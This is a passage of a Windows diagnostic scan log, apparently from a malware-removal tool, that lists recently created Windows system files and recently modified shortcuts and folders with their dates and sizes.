    2016-09-14 01:09 - 2016-09-02 11:30 - 00028160 _____ (Microsoft Corporation) C:\WINDOWS\system32\secur32.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\credssp.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00016384 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntvdm64.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\system32\apisetschema.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00006144 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-security-base-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00005120 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-file-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-threadpool-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-processthreads-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-sysinfo-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-synch-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-localregistry-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-localization-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-processenvironment-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-namedpipe-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-misc-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-memory-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-libraryloader-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-heap-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-xstate-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-util-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-string-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-profile-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-io-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-interlocked-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-handle-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-fibers-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-errorhandling-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-delayload-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-debug-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-datetime-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:30 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\system32\api-ms-win-core-console-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:21 - 04000488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntkrnlpa.exe
    2016-09-14 01:09 - 2016-09-02 11:21 - 03944680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntoskrnl.exe
    2016-09-14 01:09 - 2016-09-02 11:18 - 01314112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 01114112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kernel32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00690688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\adtschema.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00666112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00644096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00553472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00254464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ncrypt.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdigest.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msaudite.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00141312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00096768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sspicli.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TSpkg.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msobjs.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00050688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\appidapi.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\srclient.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00022016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\secur32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credssp.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00006656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apisetschema.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00005120 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-file-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wow32.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00004096 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-string-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-io-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:16 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-console-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 11:02 - 00148480 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidpolicyconverter.exe
    2016-09-14 01:09 - 2016-09-02 11:02 - 00062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
    2016-09-14 01:09 - 2016-09-02 11:02 - 00017920 _____ (Microsoft Corporation) C:\WINDOWS\system32\appidcertstorecheck.exe
    2016-09-14 01:09 - 2016-09-02 11:01 - 00064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\auditpol.exe
    2016-09-14 01:09 - 2016-09-02 10:58 - 00338432 _____ (Microsoft Corporation) C:\WINDOWS\system32\conhost.exe
    2016-09-14 01:09 - 2016-09-02 10:57 - 00296960 _____ (Microsoft Corporation) C:\WINDOWS\system32\rstrui.exe
    2016-09-14 01:09 - 2016-09-02 10:55 - 00159744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
    2016-09-14 01:09 - 2016-09-02 10:54 - 00291328 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
    2016-09-14 01:09 - 2016-09-02 10:54 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
    2016-09-14 01:09 - 2016-09-02 10:53 - 00112640 _____ (Microsoft Corporation) C:\WINDOWS\system32\smss.exe
    2016-09-14 01:09 - 2016-09-02 10:53 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\auditpol.exe
    2016-09-14 01:09 - 2016-09-02 10:53 - 00030720 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00036352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptbase.dll
    2016-09-14 01:09 - 2016-09-02 10:49 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\setup16.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntvdm64.dll
    2016-09-14 01:09 - 2016-09-02 10:49 - 00007680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\instnm.exe
    2016-09-14 01:09 - 2016-09-02 10:49 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user.exe
    2016-09-14 01:09 - 2016-09-02 10:48 - 00006144 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-security-base-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00004608 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00003584 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
    2016-09-14 01:09 - 2016-09-02 10:48 - 00003072 ____H (Microsoft Corporation) C:\WINDOWS\SysWOW64\api-ms-win-core-util-l1-1-0.dll
    2016-09-14 01:09 - 2016-08-16 13:36 - 01009152 _____ (Microsoft Corporation) C:\WINDOWS\system32\user32.dll
    2016-09-14 01:09 - 2016-08-15 22:48 - 00833024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\user32.dll
    2016-09-14 01:09 - 2016-08-15 22:35 - 03218432 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32k.sys
    2016-09-14 01:09 - 2016-08-06 11:31 - 00877056 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleaut32.dll
    2016-09-14 01:09 - 2016-08-06 11:15 - 00581632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleaut32.dll
    2016-09-14 01:09 - 2016-07-07 11:36 - 01896168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
    2016-09-14 01:09 - 2016-07-07 11:36 - 00377576 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
    2016-09-14 01:09 - 2016-07-07 11:36 - 00287976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\FWPKCLNT.SYS
    2016-09-14 01:09 - 2016-07-07 11:08 - 00046080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpipreg.sys
    2016-09-14 01:09 - 2016-07-01 11:31 - 00976896 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcomm.dll
    2016-09-14 01:09 - 2016-07-01 11:31 - 00084480 _____ (Microsoft Corporation) C:\WINDOWS\system32\INETRES.dll
    2016-09-14 01:09 - 2016-07-01 11:13 - 00741888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll
    2016-09-14 01:09 - 2016-07-01 11:13 - 00084480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\INETRES.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 01483264 _____ (Microsoft Corporation) C:\WINDOWS\system32\crypt32.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 00228864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wintrust.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 00190976 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptsvc.dll
    2016-09-14 01:09 - 2016-06-06 12:50 - 00141824 _____ (Microsoft Corporation) C:\WINDOWS\system32\cryptnet.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 01176064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\crypt32.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00179200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wintrust.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00145920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptsvc.dll
    2016-09-14 01:09 - 2016-06-06 11:23 - 00106496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptnet.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 03156480 _____ (Microsoft Corporation) C:\WINDOWS\system32\wucltux.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 00192512 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuwebv.dll
    2016-09-14 01:09 - 2016-05-13 18:09 - 00098816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll
    2016-09-14 01:09 - 2016-05-13 18:07 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinSetupUI.dll
    2016-09-14 01:09 - 2016-05-13 17:55 - 02607104 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
    2016-09-14 01:09 - 2016-05-13 17:53 - 00709120 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
    2016-09-14 01:09 - 2016-05-13 17:53 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapp.exe
    2016-09-14 01:09 - 2016-05-13 17:52 - 00140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuauclt.exe
    2016-09-14 01:09 - 2016-05-13 17:52 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups2.dll
    2016-09-14 01:09 - 2016-05-13 17:52 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\wups.dll
    2016-09-14 01:09 - 2016-05-13 17:52 - 00012288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wu.upgrade.ps.dll
    2016-09-14 01:09 - 2016-05-13 17:50 - 00174080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuwebv.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00573440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll
    2016-09-14 01:09 - 2016-05-13 17:38 - 00035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapp.exe
    2016-09-14 01:09 - 2016-05-13 17:38 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wups.dll
    2016-09-14 01:09 - 2016-05-12 13:14 - 00084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
    2016-09-14 01:09 - 2016-05-12 11:18 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
    2016-09-14 01:09 - 2016-05-12 11:18 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
    2016-09-14 01:09 - 2016-05-04 13:21 - 00114408 _____ (Microsoft Corporation) C:\WINDOWS\system32\consent.exe
    2016-09-14 01:09 - 2016-05-04 13:17 - 03244032 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 02365440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 01806848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\authui.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00504320 _____ (Microsoft Corporation) C:\WINDOWS\system32\msihnd.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msihnd.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimsg.dll
    2016-09-14 01:09 - 2016-05-04 13:17 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimsg.dll
    2016-09-14 01:09 - 2016-05-04 13:16 - 01941504 _____ (Microsoft Corporation) C:\WINDOWS\system32\authui.dll
    2016-09-14 01:09 - 2016-05-04 13:16 - 00070144 _____ (Microsoft Corporation) C:\WINDOWS\system32\appinfo.dll
    2016-09-14 01:09 - 2016-05-04 11:04 - 00128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\msiexec.exe
    2016-09-14 01:09 - 2016-05-04 10:55 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msiexec.exe
    2016-09-13 21:45 - 2016-09-13 21:48 - 00000000 ____D C:\aa Samsung Master accum
    2016-09-13 01:39 - 2016-07-08 11:32 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
    2016-09-13 01:39 - 2016-07-08 11:16 - 00002048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
    2016-09-12 21:48 - 2016-06-25 20:35 - 00041704 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
    2016-09-12 21:48 - 2016-06-25 20:27 - 01208320 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00970240 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00756736 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00344576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntprint.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetpp.dll
    2016-09-12 21:48 - 2016-06-25 20:27 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetppui.dll
    2016-09-12 21:48 - 2016-06-25 15:54 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32spl.dll
    2016-09-12 21:48 - 2016-06-25 15:53 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntprint.dll
    2016-09-12 21:48 - 2016-06-25 15:53 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntprint.exe
    2016-09-12 21:48 - 2016-06-25 15:53 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnpinst.exe
    2016-09-12 21:48 - 2016-06-25 15:41 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntprint.exe
    2016-09-12 21:48 - 2016-06-22 09:06 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\centel.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00571904 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00544256 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00294912 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00219136 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
    2016-09-12 21:48 - 2016-06-17 14:24 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
    2016-09-12 19:48 - 2016-09-17 07:41 - 00000000 ____D C:\aa Canon 600D - T3i Master accum
    2016-09-12 19:47 - 2016-09-12 19:47 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_WpdMtpDr_01_09_00.Wdf

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-09-19 14:32 - 2009-07-14 00:45 - 00020720 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2016-09-19 14:32 - 2009-07-14 00:45 - 00020720 ____H C:\WINDOWS\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2016-09-19 06:54 - 2009-07-14 01:13 - 00790438 _____ C:\WINDOWS\system32\PerfStringBackup.INI
    2016-09-19 06:54 - 2009-07-13 23:20 - 00000000 ____D C:\WINDOWS\inf
    2016-09-19 06:50 - 2009-07-14 01:08 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
    2016-09-19 03:11 - 2016-06-22 14:58 - 00000000 ____D C:\Users\SUPERDelete
    2016-09-19 03:08 - 2009-07-13 22:34 - 00000215 _____ C:\WINDOWS\system.ini
    2016-09-19 03:02 - 2016-01-29 17:35 - 00774756 _____ C:\WINDOWS\SysWOW64\PerfStringBackup.INI
    2016-09-18 20:43 - 2016-06-22 14:51 - 00001066 _____ C:\Users\Public\Desktop\VLC media player.lnk
    2016-09-18 20:43 - 2016-01-29 19:03 - 00002189 _____ C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002451 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneDrive for Business.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002415 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype for Business 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002410 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Word 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002409 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerPoint 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002373 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Access 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002372 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Excel 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002366 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Outlook 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002360 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Publisher 2016.lnk
    2016-09-18 20:43 - 2016-01-29 18:54 - 00002352 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OneNote 2016.lnk
    2016-09-18 20:43 - 2016-01-21 19:43 - 00001015 _____ C:\Users\Administrator\Desktop\Virtual Moon Atlas.lnk
    2016-09-18 20:43 - 2016-01-21 15:55 - 00001852 _____ C:\Users\Public\Desktop\SUPERAntiSpyware Free Edition.lnk
    2016-09-18 20:43 - 2016-01-21 15:52 - 00001764 _____ C:\Users\Public\Desktop\Stellarium v14.2.lnk
    2016-09-18 20:43 - 2014-11-27 18:51 - 00001333 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Media Center.lnk
    2016-09-18 20:43 - 2014-11-27 18:51 - 00001314 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows DVD Maker.lnk
    2016-09-18 20:43 - 2009-07-14 01:01 - 00001282 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk
    2016-09-18 20:43 - 2009-07-14 00:57 - 00001535 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
    2016-09-18 20:43 - 2009-07-14 00:57 - 00001340 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Anytime Upgrade.lnk
    2016-09-18 20:43 - 2009-07-14 00:57 - 00001318 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sidebar.lnk
